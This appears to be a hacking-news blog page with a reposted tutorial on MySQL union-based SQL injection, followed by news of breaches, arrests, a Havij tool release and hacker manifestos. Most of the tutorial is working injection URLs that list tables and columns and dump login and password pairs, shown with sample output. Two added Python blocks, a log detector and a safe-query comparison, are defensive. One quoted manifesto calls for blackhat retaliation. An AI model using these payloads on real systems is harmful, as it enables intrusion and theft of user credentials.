We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article by Mr. Rafael Souza, a great admirer and fan of VOGH, who has gladly shared his brilliant research paper on SQL injection (MySQL) with us. Rafael is very passionate about the cyber security domain, and he is keenly involved with the GreyHat Community and is Maintainer design of the Brazilian Backtrack Team. So without wasting time, let's go and see what Rafael has for us:

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of the mental response. To explain more comprehensively: we humans tend to err, and for this reason we are the best tool for finding these errors; even software for vulnerability analysis and scanning was improved by us.
                                                                                                       
Understanding the MySQL Injection technique:
One of the fraud techniques best known to web developers is SQL injection. It is the manipulation of a SQL statement through the variables that make up the parameters received by a server-side script; it is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements into a query by manipulating the input data of an application.

STEP BY STEP
 
(Figure 1) Detecting
Searching for the number of column(s): we test first with an error; then, when there is no error, the number can be said to be found.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions 5.x.y and up [ 1st Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions 5.x.y and up [ 1st Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2nd Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => search all you want with ASCII characters
concat() => search what you want with ASCII characters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +
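
For defenders reviewing web server logs, the following is an added example (not part of the original paper) that flags request parameters carrying the constructs used in the steps above: UNION SELECT, information_schema, the concat family, and hex or char() encoded names, which it decodes for the analyst. The log lines, the function names and the two-signature threshold are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructs that appear in the injected parameter values shown in this paper.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "concat_family": re.compile(r"\b(group_concat|concat_ws|concat)\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I),
    "trailing_comment": re.compile(r"(--|#)\s*$"),
}

# Request line of a common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_hex_names(value):
    """Decode 0x... literals so the analyst sees the hidden name (e.g. a table)."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in re.finditer(r"\b0x((?:[0-9a-f]{2})+)\b", value, re.I)]


def decode_char_calls(value):
    """Decode char(117,115,...) calls into the string they build."""
    names = []
    for m in re.finditer(r"\bchar\s*\(([\d\s,]+)\)", value, re.I):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        names.append("".join(chr(c) for c in codes if c < 0x110000))
    return names


def inspect_line(line):
    """Return one finding per query parameter that matches any signature."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    findings = []
    # parse_qsl URL-decodes each value (%20 and + become spaces).
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        hits = sorted(k for k, rx in SIGNATURES.items() if rx.search(value))
        if hits:
            findings.append({
                "param": name,
                "hits": hits,
                "decoded": decode_hex_names(value) + decode_char_calls(value),
            })
    return findings


def scan(lines, min_hits=2):
    """Alert on parameters matching at least min_hits distinct signatures.

    One signature alone is noisy (see the last sample line), so the default
    requires two.
    """
    alerts = []
    for i, line in enumerate(lines):
        for f in inspect_line(line):
            if len(f["hits"]) >= min_hits:
                alerts.append((i, f["param"], f["hits"], f["decoded"]))
    return alerts


# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /query.php?string=7 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /query.php?string=1+union+all+select+1,2,3,4,group_concat(column_name)'
    '+from+information_schema.columns+where+table_name=0x7573756172696f73-- '
    'HTTP/1.1" 200 734',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /query.php?string=1%20union%20all%20select%201,2,3,4,concat(column_name)'
    '%20from%20information_schema.columns%20where%20table_name='
    'char(117,115,117,97,114,105,111,115)%20limit%200,1-- HTTP/1.1" 200 702',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /search.php?q=credit+union+select+committee HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for idx, param, hits, decoded in scan(SAMPLE_LOG):
        print(f"line {idx}: param={param} hits={hits} decoded={decoded}")
```
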

Readers, this article is for educational purposes only. I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of this manipulation may provide unauthorized access to a restricted area while being imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other things. So I want to emphasize that this paper is for security researchers and developers, so that they take care and test their code.
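
For developers testing their own code, the following is an added example (not part of the original paper) that puts the flawed pattern beside a hardened one: string concatenation with echoed database errors versus input validation, a bound parameter and a generic error message. It assumes an in-memory SQLite database as a stand-in for the MySQL backend; the `noticias` table, the sample rows and the function names are hypothetical, while the two request values are the ones used in the steps above.

```python
import re
import sqlite3

# Request values taken from the paper's own examples.
UNION_PAYLOAD = "1 union all select 1,2,3,4,login from usuarios--"
PROBE_PAYLOAD = "1 union all select 1,2,3,4,churros from usuarios--"

# Hypothetical five-column query behind query.php?string=...
VULN_PREFIX = "SELECT id, titulo, autor, data, corpo FROM noticias WHERE id = "
SAFE_QUERY = "SELECT id, titulo, autor, data, corpo FROM noticias WHERE id = ?"


def make_db():
    """Constructed sample data; SQLite stands in for MySQL (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE noticias (id INTEGER, titulo TEXT, autor TEXT, data TEXT, corpo TEXT);
        INSERT INTO noticias VALUES (1, 'Hello', 'editor', '2012-01-01', 'First post');
        CREATE TABLE usuarios (id INTEGER, login TEXT, passwd TEXT, texto TEXT);
        INSERT INTO usuarios VALUES (1, 'demo_user', 'demo_secret', '');
    """)
    return conn


def lookup_vulnerable(conn, string_param):
    """Flawed pattern: the parameter becomes part of the SQL text, and the
    database error is echoed to the client."""
    try:
        rows = conn.execute(VULN_PREFIX + string_param).fetchall()
    except sqlite3.Error as exc:
        return {"status": 500, "error": str(exc)}  # leaks schema details
    return {"status": 200, "rows": rows}


def lookup_bound(conn, string_param):
    """Bound parameter only: the whole value is compared as data, never parsed
    as SQL, so the UNION clause has no effect."""
    return conn.execute(SAFE_QUERY, (string_param,)).fetchall()


def lookup_hardened(conn, string_param):
    """Allow-list validation, bound parameter, and a generic error message."""
    if not re.fullmatch(r"[0-9]{1,9}", string_param):
        return {"status": 400, "error": "invalid id"}
    try:
        rows = conn.execute(SAFE_QUERY, (int(string_param),)).fetchall()
    except sqlite3.Error:
        # Log the detail server-side; the client only sees a generic message.
        return {"status": 500, "error": "internal error"}
    return {"status": 200, "rows": rows}


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_bound, lookup_hardened):
        for value in ("1", UNION_PAYLOAD, PROBE_PAYLOAD):
            try:
                print(fn.__name__, repr(value), "->", fn(db, value))
            except sqlite3.Error as exc:
                print(fn.__name__, repr(value), "-> raised", exc)
```

The echoed error in the vulnerable handler is what makes the paper's "Unknown column ..." outputs possible, so suppressing database errors in responses matters even where a query cannot be fixed immediately.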

CONCLUSION
Many companies keep important information on their websites and databases. Information is the most valuable asset, and it is intangible; the question is how developers are dealing with this huge responsibility.
The challenge is to develop increasingly innovative sites, coupled with mechanisms that provide security to users.
The purpose of this paper is to present what SQL injection is, how applications are exploited, and techniques for testing, allowing the developer to build a more robust system and understand the vulnerability.
**********
I hope you all enjoy the above article as much as I did. On behalf of the entire VOGH Team, I sincerely thank Mr. Rafael Souza for his remarkable contribution.
To get more such exclusive research papers, along with all kinds of breaking cyber updates from across the globe, stay tuned with VOGH.


LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Security Breach of Sony Pictures Entertainment  

Infamous LulzSec hacker Cody Kretsinger, who pleaded guilty last year before a federal court in California to taking part in an extensive computer breach of a Sony Pictures Entertainment server, has been sentenced. The 25-year-old Kretsinger, also known as "Recursion", was one of the key members of Lulz Security, widely known as LulzSec, an offshoot of the international hacking group Anonymous. According to federal prosecutors, Cody Kretsinger has been sentenced to one year in prison in Los Angeles, to be followed by home detention. Kretsinger was also ordered by a U.S. district judge in Los Angeles to perform 1,000 hours of community service after his release from prison, said Thom Mrozek, spokesman for the U.S. Attorney's Office in Los Angeles. Prosecutors refused to say whether the hacker was co-operating with authorities in return for a softer sentence.
During last year's plea hearing, Kretsinger told a federal judge that he gained access to the Sony Pictures website and gave the information he found there to other members of LulzSec, who posted it on the group's website and Twitter. "I joined LulzSec, your honor, at which point we gained access to the Sony Pictures website," said Kretsinger in the federal court. Prosecutors said Kretsinger and other LulzSec hackers, including those known as "Sabu" and "Topiary," stole the personal information of thousands of people after launching an "SQL injection" attack on the website, ultimately causing the unit of Sony Corp more than $600,000 in financial damage; the attack also hurt Sony Corporation's reputation and the trust of its customers across the globe.
While talking about this story, we would like to recap the recent history: the arrests, followed by guilty pleas, of all the key members of LulzSec, including Ryan Cleary, Jake Davis, Jeremy Hammond, Raynaldo Rivera and Cody Kretsinger, came a month after court documents revealed that Anonymous leader "Sabu," whose real name is Hector Xavier Monsegur, had turned traitor to his community, become an FBI informer and provided information on fellow hackers.


-Source (Reuters & Yahoo) 





Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details 

Yet again Adobe, the American multinational computer software company, has fallen victim to a cyber attack. In September Adobe faced what it called a sophisticated cyber attack in which hackers breached an Adobe server in order to compromise a certificate and sign malware. In response, Adobe revoked those certificates on October 4th. After that incident, one of Adobe's databases has now been breached by a hacker, and Adobe has temporarily taken the affected Connectusers.com website offline. The attacker who claimed responsibility said that he used a SQL injection exploit in the breach. Adobe confirmed the breach and said that the hacker indeed managed to break into an Adobe server and copy the private credentials of approximately 150,000 users, including their names, email addresses and password hashes. The affected accounts include Adobe customers, Adobe employees and partners, along with U.S. military users including U.S. Air Force users, and users from Google, NASA, universities, and other companies. To prove the attack, the intruder, who goes by the name of "ViruS_HimA" and claims to be from Egypt, has released extracts from his haul on the Pastebin text hosting service.
"It was an SQL Injection vulnerability -- somehow I was able to dump the database in less requests than normal people do," said ViruS_HimA. Users passwords for the Adobe Connect users site were stored and hashed with MD5, says the hacker, which made them "easy to crack" with freely available tools. And Adobe wasn't using WAFs on the servers, the hacker notes. "I just want to be clear that I'm not going against Adobe or any other company. I just want to see the biggest vendors safer than this," he told the press. "Every day we see attacks targeting big companies using Exploits in Adobe, Microsoft, etc. So why don't such companies take the right security procedures to protect them customers and even themselves?"
"Adobe is a very big company but they don't really take care of them security issues, When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!!" he wrote. "It even takes 3-4 months to patch the vulnerabilities!" 
While talking about such big cyber attacks, we would like to remind you that in the last few months we have seen a slew of attacks against the following sites: Guild Wars 2, Gamigo, Blizzard, Yahoo, LinkedIn, eHarmony, Formspring, Android Forums, Nvidia, Philips, Zynga, VMWare, and so on. For all the latest cyber security and hacking related stories, stay tuned with VOGH.


-Source (Dark Reading, The-H)





Havij v1.16 Advanced & Automated SQL Injection Tool Released
One of the most preferred and widely used SQL injectors, Havij, has released another updated version (v1.16). In the middle of last year the ITSec team made Havij 1.15 available, so after one year of hard work we now have the next edition of this SQL-i tool. As per survey, Havij is listed as one of the finest and most widely used tools for finding SQL injection vulnerabilities on a web page. It has been used extensively by hackers and penetration testers alike.

Brief About Havij :- It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij. The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detection make it easy to use for everyone, even amateur users.

New Features :-
  • Multithreading
  • Oracle Blind injection method.
  • Automatic all parameter scan added.
  • New blind injection method (no more ? char.)
  • Retry for blind injection.
  • A new method for tables/columns extraction in mssql blind.
  • A WAF bypass method for mysql blind.
  • Getting tables and columns even when can not get current database.
  • Auto save log.
Bug Fixed:- 
  • url encode bug fixed.
  • Trying time based methods when mssql error based and union based fail.
  • Clicking get columns would delete all tables.
  • Resetting time based method delay when applying settings.
  • Oracle and PostgreSQL detection

Researcher.ibm.com (IBM Research) Hacked By KHS 

After the successful execution of Operation Greek, the hacker collective dubbed Kosova Hacker Security, or KHS, targeted the IT giant and multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official IBM Researcher site. In their statement the hacker group said that IBM had SQL-i and remote code execution vulnerabilities, which gave them access to its server. According to the KHS spokesman, another hacker group named Teamgreyhat found this vulnerability, which allowed KHS to breach the server and deface the index page. As expected, the hacker group also created a defacement mirror on Zone-H. According to sources, IBM immediately patched the security hole and restored the site to its normal state. Earlier this hacker group took a lead role in many cyber attacks on Ukraine, Israel, Hotmail and many more.




2 Norwegian Teen Hackers of "TeaMp0isoN" Arrested By British Police (PCeU)

Earlier last month MI6 arrested the leader of TeaMp0isoN, code-named "TriCk", along with a few other active members who were directly involved in the denial-of-service attack on MI6. Now two Norwegian teenagers, aged 18 and 19, have been arrested in connection with the distributed denial-of-service (DDoS) attack on the web site of the UK's Serious Organised Crime Agency (SOCA) and for swamping the hotline of the British intelligence agency (MI6) with automated Skype calls. These two hackers were active members of the hacker collective TeaMp0isoN and MLT. The two suspects were arrested in Newcastle on Wednesday evening and are being questioned about offences under the Computer Misuse Act. Computer equipment has been seized for forensic analysis, and no doubt investigators are hoping that they may find digital clues which could help uncover other suspected hackers. Erik Moestue, a Norwegian prosecutor, said "We have arrested the two we think were most important in these attacks, but we still want to talk to more people". The offence that the two stand accused of carries a maximum jail sentence of six years. "The case is still under investigation," added Moestue, noting that "It is still too early to say anything about the motive for the actions".
The authorities, no doubt, will be hoping to confirm that they have arrested the correct man. Certainly, MLT's Twitter account has been silent since 6:27pm on Wednesday evening. According to the authorities, these arrests are part of an ongoing investigation by the Police Central e-Crime Unit (PCeU) division of the Metropolitan Police into various hacking gangs that have made headlines in the last year or so.
Earlier TeaMp0isoN was directly involved with Anonymous in #OpRobinHood and #OpCensorThis. They also found a SQL-i vulnerability on the official NASA forum, and TeaMp0isoN also hacked the English Defence League (EDL), T-Mobile USA, the BlackBerry blog and many more.





TeaMp0isoN Threatened Authorities After Leader's Arrest 

A few days ago a hacker collective named TeaMp0isoN took responsibility for hacking into the British intelligence agency (MI6). Immediately after the attack, MI6 arrested the leader of TeaMp0isoN, code-named "TriCk", along with a few other active members who were directly involved in the denial-of-service attack on MI6. But the story is not over yet. The official Twitter account of TeaMp0isoN issued a warning that it will fight back against the arrest of its members.

The group linked to a Pastebin statement with a call for other hackers to unite in attacking law enforcement agencies. 

Message of TeaMp0isoN:- 
"We've lost the first and most important member of our team; our founder, our brother, our family member. Most importantly we lost a fighter for freedom, a fighter against corruption.
He strived for justice, and constantly fought against oppression and corruption, to help spread awareness on humanitarian causes, and now, he is no longer with us.
Most of you think that this is end of TeaMp0isoN and that this is end of our fight.
We're glad to shout:
#################################
#_ITS NOT OVER, IT JUST STARTED_#
#_ITS NOT OVER, WE ARE STRONGER_#
#_ITS NOT OVER, WE ARE UNITED_  #

#################################

I ask you, a fellow hacker, as a blackhat, to rise, to unite and to fight. For years the hacking scene for the most part has been misrepresented by skids, who have inevitably led to the copious amounts of faggotry and butthurt which currently pollutes the scene. Whitehats continue to lurk and grow, and nothing is preventing them from disclosing exploits.
As a collective we have to stop this, to ascend out of the underground and show the world we are not fucking around, something which TriCk firmly believed in. We, as hackers, have to unite to revive the blackhat scene, for TriCk... and everything that we stand for.
Do you support TeaMp0isoN? Help out via:
irc.tsukihi.me
#retaliation
-----------------------------------------
root@TeaMp0isoN:~# rm -rf skids/*
root@TeaMp0isoN:~# rm -rf whitehats/*
root@TeaMp0isoN:~# rm -rf governments/*
root@TeaMp0isoN:~# rm -rf justicesystem/*
root@TeaMp0isoN:~# rm -rf police/*

-----------------------------------------  ..."

Earlier TeaMp0isoN was directly involved with Anonymous in #OpRobinHood and #OpCensorThis. They also found a SQL-i vulnerability on the official NASA forum, and TeaMp0isoN also hacked the English Defence League (EDL) and exposed members' personal data, and many more.



Mega Malls India Hacked By ShadowFiend_hax0r (The Hackers Army)


A Filipino hacker code-named "ShadowFiend_hax0r" from The Hackers Army took responsibility for hacking into the official website of Shopping Malls India, also known as Mega Malls. According to the hacker, Shopping Malls India has a SQL injection vulnerability, and by exploiting it he gained access to the website's database.

The hacked database can be found in a pastebin release by the hacker. The above screenshot clearly indicates that Shopping Malls India is indeed vulnerable to SQL-i.



LulzSec Hacker Cody Kretsinger Pleaded Guilty in Sony Breach 

Accused LulzSec hacker Cody Kretsinger pleaded guilty on Thursday in federal court in California to taking part in an extensive computer breach of Sony Pictures Entertainment. Kretsinger, a 24-year-old who used the moniker "Recursion," pleaded guilty to one count each of conspiracy and unauthorized impairment of a protected computer in a deal with prosecutors.
"I joined LulzSec, your honor, at which point we gained access to the Sony Pictures website," Kretsinger told the judge after entering his guilty plea. He testified that he gave the information he got from the Sony site to other members of LulzSec, who then posted it onto the group's website and on Twitter. Kretsinger flew from Decatur, Illinois, to Los Angeles for the hearing, and responded to the judge's questions calmly, with his hands clasped behind his back.
He and other LulzSec hackers, including those known as "Sabu" and "Topiary," stole the personal information of thousands of people after launching an "SQL injection" attack on the website, and ultimately caused Sony Pictures Entertainment more than $600,000 in damages, Assistant U.S. Attorney Eric Vandevelde said. The plea agreement is under seal, although Vandevelde said Kretsinger would likely receive substantially less than the 15-year maximum sentence he faces. He could also be forced to repay any damages. His sentencing is scheduled for July 26. Neither Kretsinger nor his lawyer would comment after the proceedings.


-Source (Yahoo News & Reuters)


Library of Congress (Govt. of United States) Under Cyber-Attack, Database Exposed By BlitzSec 

The official website of the Library of Congress (Govt. of United States) faced a cyber attack from a newly formed hacker group named BlitzSec. The hackers found a SQL-i vulnerability on the Library of Congress official site, which let them gain access to the database and expose many credentials. In a pastebin release BlitzSec revealed the full database, including DB tables, columns, user IDs, emails, passwords, admin details and so on.
Earlier this group found serious security flaws in AOL.com and Ask.com which can even lead to cookie catching attacks.

Press Release of BlitzSec :- 
"Congress this is a message to you, STOP passing laws of tyranny, STOP letting those such as Rothschild and Rockefeller control the government.  Get the printing press out of the hands of the FED and back under the houses of congress!  STOP throwing the Constitution of the United States on the ground and using it as your personal doormat, stand by the Constitution, protect it from those who wish to abolish it which inturn will abolish any and all rights we have.  We are in a police state, you have the power to stop it, you have the power to return us back to what we were before thing such as NDAA and the infamous "Patriot Act". 
You say we are the criminals?  You say we are the terrorists, well ladies and gentle men of congress, I'm sorry to say but you are wrong... Dead wrong, you my friends are the criminals, you my friends are the terrorists.  The Constitution is not just "An outdated piece of paper" as you and the rest of the government think, it is what our country was founded the those principles were what helped form this great nations, and you are destroying it now.  If you do not do something soon, you can take our word, We The People will rise up, We The People will put an end to it and We The People will return this country back to its former greatness..."




China Police (Govt. of China) & Houston Country Official Site Hacked By Anonymous  

The infamous hacker named CabinCr3w from Anonymous strikes again. He broke into the official website of Houston County and defaced the index page with racy images of girls in their underwear. This attack took place late last night, as confirmed by a tweet from the hacker collective. After that the site remained offline for a few hours, and this morning it was restored to its normal state. Soon after this, they moved on to China, where another hacker named s3rverexe hit the official website of Panjin Dragnet, which is that of the Panjin City Public Security Bureau of the Chinese Police. In a pastebin release the hacker said the website is vulnerable to SQL-i, and he openly posted the vulnerable links through which an attacker can exploit the database of that site.
The above screenshot is taken from one of the official Twitter accounts of this hacker collective, where they took responsibility for these two hacks.



 

United Nation Hacked, Vulnerability Exposed & Database Dumped By Casi
The United Nations official website has again become the victim of a cyber attack. Earlier TeaMp0isoN hacked the United Nations server and stole more than a thousand user names and passwords. This time another hacker named Casi targeted the United Nations. In a press release the hacker posted many blind SQL-i vulnerable links of the UN official site, through which any attacker can get inside the database and cause a lot of damage. The hacker group also dumped the database of the United Nations. According to the hacker "I fuck actually system... I fighting for Internet Freedom, equiality & rights for all. You're FREEDOM my brothers & my sisters ! <3" The dumped database can be found in a pastebin release by the hacker, where they have also claimed that they are fighting for freedom. So it seems that the UN just has bad cyber security. It must be embarrassing for them to be hacked by such a basic SQL injection attack. Passwords were not exposed, but the real danger lies in what other hackers can do with the information. The United Nations has still not responded about this hack.



New York State Senate Official Site Is Vulnerable
A few days ago Sec Indi Security Team exposed a cross-site request forgery (CSRF) vulnerability in the WikiLeaks website. Now they have found SQL-i on the official website of the New York State Senate. Earlier this group also detected a SQL-i vulnerability on the official website of the US Senate, and they hacked the admin panel of the famous Indian website click India. The vulnerability on the NY State Senate site is still unpatched. The hacker group has submitted the vulnerable link to VOGH. According to the hacker group, an attacker can easily misuse this security flaw and gain illegal access to the database of the NY State Senate.


